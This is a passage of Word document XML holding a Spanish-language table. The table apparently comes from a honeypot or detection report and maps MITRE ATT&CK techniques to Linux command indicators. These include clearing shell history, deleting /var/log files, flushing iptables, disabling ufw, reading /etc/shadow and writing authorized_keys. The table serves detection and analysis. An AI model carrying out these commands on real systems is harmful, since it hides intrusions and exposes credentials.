            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Escritura en authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1098</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">chpasswd, passwd, usermod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Create Account: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1136.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">useradd, adduser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled Task/Job: Cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">crontab -e, | crontab -, /etc/cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">File and Directory Permissions Modification: Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1222.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod, chattr, chown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicator Removal: Clear Command History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1070.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">history -c, unset HISTFILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicator Removal: Clear Linux or Mac System Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1070.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">rm de /var/log, wtmp, btmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Deobfuscate/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">base64 -d, xxd -r</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impair Defenses: Disable or Modify System Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1562.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">iptables -F, ufw disable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Brute Force: Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evento cowrie.login.failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OS Credential Dumping: /etc/passwd and /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1003.008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lectura de /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">uname, /proc/cpuinfo, free, nproc, lscpu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Discovery: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
